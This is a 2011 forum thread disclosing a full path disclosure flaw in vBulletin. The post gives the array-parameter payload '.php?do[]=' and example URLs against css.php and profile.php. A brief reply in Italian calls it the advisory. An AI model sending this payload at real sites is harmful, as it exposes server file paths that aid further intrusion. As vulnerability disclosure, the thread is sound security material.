Author Topic: vbulletin Full Path Disclosure Vulnerability  (Read 14864 times)

Bl4k3

  • Guest
on: May 22, 2011, 02:28:08 AM
vbulletin Full Path Disclosure Vulnerability

  • Vulnerability:
Quote
.php?do[]=

  • Examples:
Quote
http://[SITE].COM/[FORUM_DIRECTORY]/css.php?do[]=
http://[SITE].COM/[FORUM_DIRECTORY]/profile.php?do[]=

  • Tested on vBulletin 4.0.7 - Should work on all releases till date -
  • Wont work if errors are disabled via php.ini or httpd.conf -




SYSTEM_OVERIDE

  • Guest
Reply #1 on: May 22, 2011, 01:20:54 PM
Ah eccolo l'advisory xD